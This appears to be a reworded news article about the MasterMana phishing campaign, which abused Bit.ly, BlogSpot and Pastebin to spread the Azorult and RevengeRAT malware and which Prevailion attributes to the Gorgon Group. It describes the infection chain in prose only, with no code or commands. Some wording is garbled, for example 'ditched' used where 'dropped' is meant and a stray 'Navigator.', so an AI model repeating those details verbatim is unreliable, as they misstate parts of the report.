A malicious campaign targeting businesses around the world has been observed using a combination of pages hosted on Bit.ly, BlogSpot and Pastebin to spread Azorult and RevengeRAT malware.
The command and control (C2) storage infrastructure used by the campaign dubbed MasterMana by Prevailion researchers who spotted it allows the threat actors behind the attacks to disguise malicious traffic from security solutions.
“Based on the Tactics, Techniques and Procedures (TTP) exposed, we associated it – with moderate confidence – with the ‘Gorgon Group’, a well-known group that has been active for many years and attributed to multiple ongoing malicious campaigns. Says the Prevailion report. .
Gorgon Group (aka Subaat) is a state-sponsored hacking group with connections in Pakistan active since at least 2017 according to Palo Alto Networks Unit 42.
The group is known to have been behind various cybercrime and cyber espionage attacks, including, but not limited to, campaigns targeting government entities in the United States, Europe and Asia.
Chain of infection powered by third-party infrastructure
“This operation, which began as early as December 2018, appears financially motivated, given the seemingly indiscriminate targeting of work email addresses through phishing and the inclusion of specific functions to steal information associated with cryptocurrency wallets,” added Danny adamitis and Matt thompson in their report.
The malware is delivered to target computers using a phishing campaign that uses emails bundling malicious Microsoft Excel document attachments that, when opened, would drop a VBS script payload.
The script opens a BlogSpot site that launches the legitimate Mshta (Microsoft HTML Application Host) utility to open a second stage payload hosted on Pastebin and designed to kill all running Word, Excel, Powerpoint, and Publisher processes and to configure scheduled tasks and registry keys for persistence.
In some cases, the final malware payload provided by MasterMana operators was the well-known RevengeRAT Remote Access Trojan (RAT), capable of opening remote shells, allowing attackers to manage system files, processes and services, modify the Windows registry, log keystrokes, harvest user passwords and access the webcam, among others.
Other attacks ditched the Azorult Trojan, a malware designed to exfiltrate as much sensitive information as possible, from bank credentials and cryptocurrency wallets to files, passwords, cookies, and user history. Navigator.
Azorult is also known to act as a malware downloader and has previously been seen to spread data theft and cryptocurrency malware, as well as ransomware as part of large-scale campaigns.
“In this case, the threat actors struck the perfect balance: sophisticated enough to avoid automated detection via third-party services and obfuscation while remaining below the APT sophistication level to avoid drawing attention to their campaign, ”concludes Prevailion.
A very similar campaign dubbed “Aggah” by researchers at Unit 42 at Palo Alto Networks, which was spotted in March, has also been observed abusing Bit.ly, BlogSpot and Pastebin to distribute malware.
Even though some of the malicious techniques used in this campaign overlapped with those used by the Gorgon Group, researchers at Palo Alto Networks said at the time that there was no “concrete evidence that this attack campaign is associated with Gorgon “.